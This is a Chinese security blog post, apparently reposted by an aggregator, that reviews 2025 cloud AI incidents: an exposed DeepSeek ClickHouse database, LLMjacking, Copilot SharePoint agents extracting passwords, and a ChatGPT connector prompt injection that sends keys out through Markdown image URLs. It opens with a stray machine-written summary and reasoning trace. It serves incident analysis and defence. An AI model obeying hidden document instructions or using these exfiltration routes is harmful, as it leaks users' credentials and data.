从现网到靶场：2025云上AI安全事件深度复盘

从现网到靶场：2025云上AI安全事件深度复盘
嗯，用户让我总结一下这篇文章的内容，控制在一百个字以内，而且不需要用“文章内容总结”之类的开头。好的，首先我得通读一下这篇文章，了解它的主要结构和重点。文章分为四个部分：概述、重点安全事件回顾、安全建议和绿盟云靶场AI场景创新方案。概述部分提到随着AI应用上云，安全风险增加，绿盟科技发布了五期报告，分析了48起泄露事件，其中21起与AI相关。攻击面包括配置错误、组件缺陷、提示词注入和云凭证失窃。接下来的重点安全事件回顾了四个案例：Clickhouse配置错误导致数据泄露、LLM劫持攻击、Copilot漏洞窃取数据和提示词注入攻击。每个事件都详细描述了攻击路径和影响。安全建议部分针对四种攻击面提出了具体的防护措施，比如配置管理、权限控制、密钥管理等。最后的创新方案部分介绍了绿盟科技的靶场解决方案，用于实战攻防演练。现在要总结在100字以内，我需要抓住核心点：AI上云带来的安全威胁类型、绿盟的报告分析结果以及提出的防护建议。同时要简洁明了，不需要复杂的结构。可能的总结：“文章分析了云上AI安全威胁，包括配置错误、组件缺陷、提示词注入和云凭证失窃，并通过四个案例展示了实际风险。建议加强配置管理、权限控制和密钥保护。” 这样大约60字左右，符合要求。 </think> 文章分析了云上AI安全威胁，包括配置错误、组件缺陷、提示词注入和云凭证失窃，并通过四个案例展示了实际风险。建议加强配置管理、权限控制和密钥保护。 2026-1-26 03:56:9 Author: blog.nsfocus.net(查看原文) 阅读量:3 收藏

一. 概述

随着AI应用全面拥抱云端，新兴组件与复杂的供应链在带来便利的同时，也让配置缺陷与漏洞利用的风险急剧上升，云上AI安全形势日益严峻。针对这一趋势，绿盟科技星云实验室在2025年共发布了5期云上数据泄露安全报告[1-5]。通过对全球48起典型泄露事件的汇总分析，其中AI相关事件高达21起。经分析显示，这些事件的爆发主要源于四种典型的攻击面：由云基础设施配置错误引发的数据泄露、AI组件设计逻辑缺陷和权限滥用、提示词注入攻击，以及因云凭证失窃导致的LLM服务资源盗用。这些脆弱性配置和漏洞一旦被利用，将直接威胁到模型参数、聊天记录及AI密钥等核心资产的安全。针对上述核心攻击面，本文从2025年的报告数据中精选了4起典型实战案例进行深度剖析。区别于单纯的攻防推演或理论研究，本文聚焦于真实世界中发生的现网AI安全事件。这些事件暴露的安全风险往往比理论研究更为复杂，因此具有高度参考价值。我们将结合事件根因溯源与MITRE ATT&CK技术框架，还原攻击路径与技术细节，期望读者能从这些真实案例中获取实战经验，并依据文中提供的切实可行的防护建议，有效收敛暴露面，提升云上AI安全防护意识。

二. 重点安全事件回顾

2.1事件一. Deepseek公司使用的 Clickhouse数据库存在配置错误导致出现严重聊天数据泄露

事件时间：2025年1月29日泄露规模：百万行的日志流，包含聊天历史记录，密钥等敏感信息攻击面：由云基础设施配置错误引发的数据泄露

事件回顾：

2025年1月29日，Wiz安全研究团队发现了互联网中一个暴露的Clickhouse服务，并确定该服务属于我国AI初创公司深度探索（DeepSeek）。Clickhouse能够对底层的数据库中的数据进行访问，利用该Clickhouse服务，Wiz安全研究员发现了约一百万行DeepSeek的日志流，包含历史聊天记录，密钥等其他敏感信息。

发现问题后，Wiz安全研究团队立即向DeepSeek通报了这一问题，DeepSeek立即对其暴露的Clickhouse服务进行了安全处置。

事件分析：

ClickHouse是一个开源的列式数据库管理系统（DBMS），专为在线分析处理（OLAP）设计。它能够高效处理大规模数据，支持实时查询和分析，适用于日志分析、用户行为分析等场景。ClickHouse存在未授权访问漏洞，对于一个未添加任何访问控制机制的ClickHouse服务，任意用户可以通过该服务暴露的API接口执行类SQL命令。

本次事件中，Wiz安全研究团队通过技术手段探测了约30个DeepSeek面向互联网的子域名的80和443端口。这些暴露服务大多是托管聊天机器人界面、状态页面和 API 文档等资源，也都没有相关安全风险。为了进一步探寻DeepSeek的暴露风险，Wiz安全研究团队将探测范围扩大到了除80、443端口之外的非常规端口，如8123、9000端口等。最终，他们发现了非常规端口的多个子域名下均有暴露服，如：

http://dev.deepseek.com:8123
http://oauth2callback.deepseek.com:9000
http://dev.deepseek.com:9000
http://oauth2callback.deepseek.com:8123

在确定这几个暴露的服务为Clickhouse后，Wiz安全研究团队通过ClickHouse服务的API对底层的数据库进行查询测试，包含查询数据库、查询数据库中的表，如下图所示：

图1. 疑似Clickhouse泄露数据

从2025年1月6日起，存在泄露风险的日志信息包含对各种内部 DeepSeek API 端点的调用日志、纯文本日志，包括聊天历史记录、API 密钥、后端详细信息和操作元数据等。VERIZON事件分类：Miscellaneous Errors（杂项错误）所用MITRE ATT&CK技术：

技术	子技术	利用方式
T1590 收集受害者网络信息	.002 域名解析	攻击者可能利用主域名对目标进行子域名爆破。
T1046 网络服务发现	N/A	攻击者确定目标域名开放的端口和服务。
T1106 原生接口	N/A	攻击者可能利用Clickhouse API与数据库交互。
T1567 通过Web服务外泄	N/A	攻击者可能利用Clickhouse API进行数据窃取。

参考链接：https://www.wiz.io/blog/wiz-research-uncovers-exposed-deepseek-database-leak

2.2事件二. 大量用户凭证失窃，LLM劫持攻击目标转DeepSeek

事件时间：2025年2月7日泄露规模：约20亿大模型Token遭到非法利用攻击面：因云凭证失窃导致的LLM服务资源盗用

事件回顾：

2024年5月，Sysdig威胁研究团队发现一种针对大模型的新型网络攻击方式——LLM jacking，又称LLM劫持攻击。

2024年9月，Sysdig威胁研究团队表示，LLM劫持攻击攻击的频率和普及正在增加。DeepSeek也逐渐成为被攻击对象。

2024年12月26日，DeepSeek发布了高级模型DeepSeek-V3 。几天后，Sysdig威胁研究团队发现DeepSeek-V3已在Hugging Face上托管的OpenAI反向代理（ ORP ）项目中所实现。

2025年1月20日，DeepSeek发布了一种称为DeepSeek-R1的推理模型。次日，支持DeepSeek-R1的ORP项目已经出现，多个ORP已填充了DeepSeek API密钥，并且已有攻击者开始利用这些密钥。

在Sysdig威胁研究团队的研究工作中，发现ORP非法利用的大模型Token总数已超过20亿。

事件分析：

LLM劫持攻击指攻击者利用窃取的云凭证，针对云托管的LLM服务发起的资源劫持与滥用攻击。在攻击过程中，攻击者首先通过漏洞（Laravel框架的CVE-2021-3129）获取受害者的云凭证，随即利用 OAI反向代理搭建非法服务通道，将窃取到的受害者LLM服务访问权限封装成API，并在黑灰产市场向其余客户低价出售以谋取暴利。这种行为导致第三方的大量调用请求直接消耗了受害者的云资源配额，使其在毫不知情的情况下承担巨额的云服务成本。其中，OAI反向代理作为一种LLM服务的中间件，能够帮助攻击者集中管理对多个受害LLM账户的访问，而不暴露底层的凭据和凭据池。利用OAI反向代理，攻击者能够在不支付相应费用的情况下，通过重定向请求并隐藏身份，让购买者无缝使用DeepSeek等高成本LLM模型。这不仅实现了攻击者的隐匿和获利，更使得受害者的云计算资源在不被察觉的情况下遭到长期的大规模滥用。

图2. 事件攻击路径

OAI反向代理是实现LLM劫持攻击的必要条件，而实现LLM劫持攻击的关键是如何窃取到正常用户所购买的各类LLM服务的凭证、密钥等。攻击者对凭证的窃取往往是通过传统的Web服务漏洞、配置错误等方式（如Laravel框架的CVE-2021-3129漏洞等）。一旦获得这些凭证，攻击者便可以访问云环境中的LLM服务，例如Amazon Bedrock、Google Cloud Vertex AI等。

图3. Laravel漏洞利用流程

这种攻击不仅仅是为了获取数据，更多的是为了通过出售访问权来获取经济利益。VERIZON事件分类：Basic Web Application Attacks （基础Web应用类攻击）所用MITRE ATT&CK技术：

技术	子技术	利用方式
T1593 搜索开放网站/域	.002 搜索引擎	攻击者利用OSINT方法在互联网中收集暴露服务信息。
T1133 外部远程服务	N/A	攻击者识别暴露服务中存在漏洞。
T1586 泄露账户	.003 云账户	攻击者利用漏洞窃取LLM服务或云服务凭证。
T1588 获取能力	.002 工具	攻击者部署开源OAI反向代理工具。
T1090 代理	.002 外部代理	攻击者利用OAI反向代理软件集中管理多个LLM账户的访问。
T1496 资源劫持	N/A	攻击者利用访问LLM注入攻击进行LLM资源劫持。

参考链接：https://sysdig.com/blog/llmjacking-targets-deepseek/

2.3事件三. 黑客利用微软SharePoint版 Copilot AI漏洞窃取密码及敏感数据

事件时间：2025年5月泄露规模：SharePoint站群中存放的成千上万份文档与内部资料攻击面：AI组件设计逻辑缺陷和权限滥用

事件回顾：

2025 年 5 月，安全机构Pen Test Partners在报告中揭示攻击者可利用Microsoft Copilot for SharePoint代理避开传统日志监控去深度索引和获取SharePoint站点中的敏感信息，包括密码、私钥、API密钥、测试报告、内部文档等。（SharePoint是一个支持协作工作和信息共享的微软平台。它们的工作方式类似于包含图形和文本的常规Intranet页面，但它们也提供了存储和管理文件的位置。值得注意的是，当文件和图像在Microsoft Teams上共享时，SharePoint会自动为它们创建一个站点。）代理方式有两种：微软预先构建的默认代理和由组织构建的自定义代理。

图4. 疑似微软Copilot代理聊天泄露信息1

通过这些代理，攻击者可以在短时间内检索和浏览大量数据集，还可以帮助攻击者快速理解内部术语、首字母缩略词和其他行话的含义。通过向代理解释需要的内容，它可以帮助攻击者准确计算出攻击者想要什么，并将这些内容反馈给攻击者，且不会显示访问日志和痕迹。

图5. 疑似微软Copilot代理聊天泄露信息2

为防止类似问题，安全专家建议确保完全阻止SharePoint中存在敏感信息，并采取适当的访问控制；建议限制代理的创建，并使用监控攻击监测试图利用这些服务的攻击者。事件分析：该安全事件的核心原因在于Microsoft 365 SharePoint 中默认启用的 Copilot AI Agent 存在访问控制不严格、行为不可审计、以及提示词可被滥用等设计缺陷，导致攻击者可以通过合法界面绕过权限限制并获取大量敏感数据。

Default Agents滥用：Copilot Default Agent默认安装在所有 SharePoint 站点里，具有访问站点内容的能力；使用特定prompt（如“请扫描此站点并列出密码、私钥、API密钥”），无需显式下载即可提取敏感信息，包括文件内容和链接；Agent提供文档内容摘要，但不会记录为“最近访问”，从而绕过日志监控

绕过权限限制：即使用户处于“Restricted View”，Copilot也能提取文件内容，例如“Restricted View” 权限下，攻击者仍可获得 Passwords.txt 中的密码明文

规避访问日志记录：通过Copilot访问的文件不会被标记为“已打开”或“最近访问”；常规监控手段无法发现Copilot的访问行为

自定义Agent滥用：攻击者可注册自己的AI Agent；自定义Agent 可配置更高访问权限，甚至跨站点；可在Agent Prompt训练数据中预嵌后门，或用于数据转储

VERIZON事件分类：System Intrusion（系统入侵）

所用MITRE ATT&CK技术：

技术	子技术	利用方式
T1550使用有效账户	.004 Web 会话 Cookie	利用现有Copilot Agent建立访问通道
T1550使用有效账户	N/A	利用SharePoint授权的 Agent 控制访问
T1083 文件和目录发现	N/A	使用Agent搜索SharePoint站点中的文件
T1213数据来自本地系统	N/A	从SharePoint/Wiki 等信息库中提取数据
T1020自动数据传输	N/A	自动化提取敏感文档
T1027模糊处理	N/A	Agent返回AI摘要而非完整日志来隐藏行为

参考链接：https://mp.weixin.qq.com/s/NNi6hwYeIcQtrOhVWkRyNw

2.4事件四. ChatGPT Google Drive连接器漏洞曝光：0 Click操作即可窃取用户敏感数据

事件时间：2025年8月泄露规模：此次攻击可导致连接到ChatGPT的第三方应用（如Google Drive, SharePoint, GitHub等）中的敏感数据泄露。具体泄露的信息类型包括但不限于：API密钥和访问令牌、登录凭证、存储在云服务中的机密商业文件或个人数据，攻击的潜在影响范围是所有启用了ChatGPT连接器功能，并用其处理来自不可信来源文件的用户。攻击面：提示词注入攻击

事件回顾：

攻击准备：攻击者创建一个包含恶意指令的文档。这些指令通常使用极小或白色的字体隐藏起来，肉眼难以察觉。

图6. 带有恶意指令的文档

社工：攻击者通过Google Drive、SharePoint或电子邮件等方式，将这个恶意指令的文档分享给目标受害者。用户触发：受害者看到这个分享来的新文件后，可能会向其集成了Google Drive等服务的ChatGPT助手发出一个看似无害的请求，例如：“总结一下这个刚分享给我的文档”。攻击执行： ChatGPT在执行总结任务时，会读取该文档。文档中隐藏的恶意指令被AI执行，它会覆盖用户原本的总结任务。

图7. 恶意提示词注入

数据窃取：恶意指令会命令ChatGPT在受害者连接的云盘中搜索其他文件，寻找如API Key、Password等关键词的敏感信息。数据外泄：一旦找到敏感数据，恶意指令会利用特定的机制将数据外泄。整个过程无需受害者进行任何额外点击，在后台自动完成。

图8 敏感信息被回传至攻击者服务器

漏洞披露： 2025年8月6日，Zenity团队公开披露了该漏洞的完整细节。事件分析：2025年5月，OpenAI发布了ChatGPT连接器，该功能允许ChatGPT从Google Drive、Sharepoint文档中读入内容

图9. ChatGPT连接器支持的第三方应用

通过连接器这一功能虽然方便用户可以免登录第三方应用，但由于三方应用中可能也会存放敏感信息，因此存在通过提示词注入的方式窃取敏感信息的风险，该事件的根本原因在于AI模型目前难以严格区分用户的良性指令和嵌入在被处理数据中的恶意指令。当ChatGPT处理来自外部的、不受信任的文档时，它会将文档中隐藏的指令与用户的正常指令同等对待，从而导致被恶意操控。该事件的攻击路径核心并非是受害者自己创建恶意文件，而是处理了由攻击者分享来的恶意文件。受害者的ChatGPT连接了其私人的Google Drive，当它奉命读取攻击者分享的恶意文件时，恶意指令就被激活，从而使AI“倒戈”，开始扫描受害者自己的云盘中的其他文件，窃取数据。

图10. 通过提示词注入窃取连接第三方应用中的敏感信息

本次事件中，攻击者还有效使用了绕过安全检测的方法，因为最终回传敏感信息到攻击者服务器时，通常面临安全策略的检测，因此攻击者的策略是使用ChatGPT的Markdown渲染功能来实现数据外泄，从而绕过了OpenAI对直接访问恶意URL的封锁。具体方法可简单描述为：当恶意指令窃取到敏感数据，如API密钥后，恶意指令不会尝试生成一个指向 http://attacker.com的链接，因为这会被安全策略阻止。取而代之，指令会命令ChatGPT生成一段Markdown文本，并请求将其渲染成一张图片。例如，指令会是以下方式：!

(https://some-trusted-service.com/render?data=窃取到的API密钥) 的Markdown单元格”。

ChatGPT为了渲染这张图片，会向URL中的 https://some-trusted-service.com 发起一个合法的请求。这个域名本身是可信的（可能是OpenAI自身或其云服务商Azure的Blob存储服务），因此可以通过URL过滤器的检测。

然而，窃取到的敏感数据会作为参数（?data=…）被附加在该合法请求的URL中。攻击者只需监控其能控制的、或能够公开访问日志的渲染服务端点，就能从请求日志中捕获这些参数，从而完成数据窃取。

VERIZON事件分类： Social Engineering（社工）

所用MITRE ATT&CK技术：

技术	子技术	利用方式
T1566 钓鱼攻击	N/A	攻击者通过云服务，如Google Drive，将一个包含恶意指令的“有毒”文档分享给受害者
T1059 命令和脚本解释器	N/A	ChatGPT本身扮演了“解释器”的角色，而隐藏在文档中的恶意提示则充当了“脚本”。当ChatGPT处理该文档时，并非在执行传统的Shell命令或PowerShell脚本，而是在解释并执行恶意提示所描述的指令
T1204 用户执行	N/A	受害者要求ChatGPT去处理被分享的恶意文件
T1027 混淆文件或信息	N/A	攻击者通过将恶意指令设置为1像素的白色字体，将其隐藏在文档的白色背景中，使得普通用户无法直接察觉
T1567 通过Web服务进行数据渗漏	N/A	攻击者为了绕过OpenAI可能存在的恶意URL过滤器，没有直接将数据发送到攻击者控制的服务器。而是巧妙地利用了ChatGPT的Markdown图片渲染功能，将窃取的数据编码后作为参数，附加到一个合法的、受信任的Web服务，如Azure Blob Storage或其他图片渲染服务的URL中
T1083 通过Web服务进行数据渗漏	N/A	恶意指令被执行后，会命令ChatGPT在受害者连接的云存储，如Google Drive中进行搜索，寻找其他文件。
T1552文件中的凭证	.001	搜索包含特定关键词，如API key, password, secret的文件
T1530 云存储对象的数据	N/A	一旦发现包含敏感信息的目标文件，恶意指令会驱使ChatGPT读取这些文件内容，并提取出具体的敏感数据
T1567 渗漏到云存储	.002	窃取到的数据被编码进一个URL参数中，并通过ChatGPT对一个外部云服务的合法API调用被发送出去。攻击者随后可以从该服务的访问日志中提取出这些数据，完成最终的渗透

参考链接：

https://help.openai.com/en/articles/9309188-add-files-from-connected-apps-in-chatgpt

https://x.com/tamirishaysh/status/1953534127879102507

https://www.secrss.com/articles/81932

https://labs.zenity.io/p/agentflayer-chatgpt-connectors-0click-attack-5b4

三. 安全建议

3.1针对云基础设施配置错误引发的数据泄露安全建议

回顾2025年，全球出现了多起因租户配置不当引发的数据泄露事件，例如：2025年9月，研究人员发现一个与VyroAI相关的Elasticsearch实例因未正确配置访问控制，泄露了该公司三款AI应用 — ImagineArt、Chatly和ChatbotxAI — 累计116GB的实时用户日志。2025年8月，研究人员再次发现一个未受保护且公开暴露的Kafka Broker实例，其中包含大量用户个人信息。该Kafka Broker负责处理两款AI应用 —“Chattee Chat-AI Companion”和“GiMe Chat-AI Companion”的实时数据流。此次暴露导致超过40万用户的敏感信息泄露，包括4300万条聊天记录、60余万张图片与视频，以及IP地址、设备唯一标识符和购买日志等数据[6]。

我们可以看出，这些案例并非针对AI模型的直接攻击，而是利用了AI服务所依赖的底层基础设施在配置上的疏忽，最终导致用户数据与隐私对话外泄。此类情况表明，AI系统的安全防护必须覆盖完整的技术栈与系统生命周期。因此需要AI组件使用者更侧重于收敛AI系统依赖第三方组件的暴露面，以及为AI资产进行自动化配置审计，包括：

（1）默认关闭所有AI服务的公网访问权限，通过内网或VPN访问。对于必须开放的API，必须配置IP白名单。

（2）重点扫描对象存储存储桶权限、Elasticsearch及向量数据库的授权状态。确保没有任何数据库处于无密码或默认端口开放状态。

3.2针对提示词注入攻击的安全建议

由提示词注入引发的数据泄露事件正日益增多，许多新兴的攻击手法，例如通过提示词诱导AI模型执行恶意指令，甚至将敏感信息渲染为图片以规避传统检测，正对数据安全构成严峻挑战。同时，AI技术的持续演进，如多模态化、智能体化在催生新技术的同时也带来了新的风险。特别是AI模型与第三方应用的集成，虽然提升了便捷性，但权限配置不当可能导致跨用户间的敏感信息泄露。AI组件使用者应当将模型输入和输出同意进行隔离和过滤，例如：（1）针对输入的Prompt进行过滤，如可将系统指令和用户输入物理隔开，并在系统提示词中明确指令忽略任何高风险要求

（2）在模型前部署AI安全围栏，通过识别拦截常见的注入特征字段

（3）针对模型的输出做正则匹配和关键词过滤

3.3针对因云凭证失窃导致的LLM服务资源盗用安全建议

从本文的事件案例分析可以看出，LLM Key Jacking攻击的根源在于两个，一个是攻击者使用了盗窃的云凭证，另一个是受害者未配置LLM服务的费用预警，因此安全建议将从以上两点出发。建议AI组件使用者：（1）进行密钥生命周期管理Verizon 2025 DBIR报告中提出，凭证泄露风险依旧严重，公开代码仓库中可获取的泄露密钥占比高达50%。具体分布为Web应用凭证占39%，其中JWT认证令牌占66%，云密钥中Google Cloud API占比最高43%，值得注意的是，凭证修复中位数周围长达94天，形成持续暴露窗口，使攻击者能够轻易绕过认证机制。

图11. Verzion报告截图

因此建议AI组件使用者彻底杜绝将API Key硬编码在代码仓库或环境变量中，建议使用公有云厂商的密钥管理服务，例如 AWS Secrets Manager、Azure Key Vault动态调用凭证。配置定期自动轮转机制，缩短凭证泄露后的有效窗口期。（2）进行费用熔断保护首先建议AI组件使用者利用厂商自有支付模式机制，一般厂商均提供预付费和自动充值两种模式，DeepSeek、OpenAI 预付费机制为充值一定金额，用完即停，从而风险也相对可控，攻击者最多将余额刷为零，切记勿开启自动充值。

其次厂商通常也提供硬性配额管理，例如可针对RPM（每分钟请求数）和TPM(每分钟token数)进行配额管理，建议可以将TPM压缩至自身业务刚好匹配够用的水平，例如自身业务本身只需要每分钟1W Token, 那就不要保留过多Token配额，这样可以极大延缓攻击者消耗资金的速度。

3.4针对AI组件设计逻辑缺陷与权限滥用安全建议

当前AI 组件例如Microsoft Copilot通常与SharePoint、Wiki、代码库等内部知识库进行了深度集成。这种集成带来两个弊端，首先是AI能够跨越文档格式，直接读取并理解存储在这些平台上的海量非结构化数据。使得攻击者无需知道文件名或具体路径，只需利用AI的语义理解能力提问，AI便会利用其对底层 SharePoint/Wiki 数据的索引权限，轻易将这些藏在角落的敏感信息挖掘出来并呈现给攻击者。其次是集成越深，开放AI相关权限就越大，从而可能引发数据泄露。对此，建议AI组件使用者：（1）推行凭证不落地规范：强制要求凭证存储于专用密码管理工具，协作文档中仅保留引用链接，严禁明文记录。
（2）实施敏感数据清洗：接入敏感数据发现工具，对SharePoint等AI索引范围内的平台进行全方位扫描与清理。
（3）收敛权限与防范影子AI：限制Agent范围并实施隔离，审查SaaS默认配置；建议全局关闭普通用户创建自定义Agent的权限，防止不可控的影子AI泛滥。

四. 绿盟云靶场AI场景创新方案

大模型与云环境的深度融合导致了诸多风险，通过前期报告的深度分析，我们认为，大模型自身安全漏洞可直接威胁云底座，而反之云环境的脆弱性也可能成为操控模型的跳板，两者安全边界处于高度重合状态，鉴于此绿盟科技星云实验室的云靶场AI场景解决方案引入双向威胁模型，构建了覆盖实战攻防全链路的靶场环境，重点呈现两大核心场景：大模型对云基础设施的威胁：从模型能力滥用到基础设施控制在这一类场景中，靶场重点还原大模型被纳入云原生系统后，其输出结果被自动采信并直接作用于基础设施所形成的真实攻击路径。如下图所示，该类威胁并非源于模型本身的缺陷，而是源于模型能力与云环境执行能力之间缺乏有效安全边界。

图12 模型对云基础设施的威胁场景分类

云基础设施对大模型的反向威胁：从运行环境控制到模型行为操控
在此类威胁场景中，靶场重点关注云基础设施本身如何成为攻击大模型的关键跳板。攻击者不再局限于通过提示词影响模型输出，而是借助云环境中的执行能力、逃逸路径、供应链环节与控制面权限，从运行环境、权限体系与数据上下文等多个层面，直接接管或长期影响大模型的行为。

图13 云基础设施对大模型的反向威胁场景分类

参考文献

[1] https://book.yunzhan365.com/tkgd/eird/mobile/index.html[2] https://book.yunzhan365.com/tkgd/olgu/mobile/index.html[3] https://book.yunzhan365.com/tkgd/rsja/mobile/index.html

[4] https://book.yunzhan365.com/tkgd/fzbu/mobile/index.html

[5] https://book.yunzhan365.com/tkgd/rpyc/mobile/index.html

内容编辑：浦明

责任编辑：吕治政

* 注：本文章仅代表作者观点，不代表绿盟科技立场。所有原创内容版权均属【绿盟科技研究通讯】公众号，原文链接如下：https://mp.weixin.qq.com/s/dEOtfZI1Kh_P77ZsYDnvIQ

文章来源: https://blog.nsfocus.net/%e4%bb%8e%e7%8e%b0%e7%bd%91%e5%88%b0%e9%9d%b6%e5%9c%ba%ef%bc%9a2025%e4%ba%91%e4%b8%8aai%e5%ae%89%e5%85%a8%e4%ba%8b%e4%bb%b6%e6%b7%b1%e5%ba%a6%e5%a4%8d%e7%9b%98/
如有侵权请联系:admin#unsafe.sh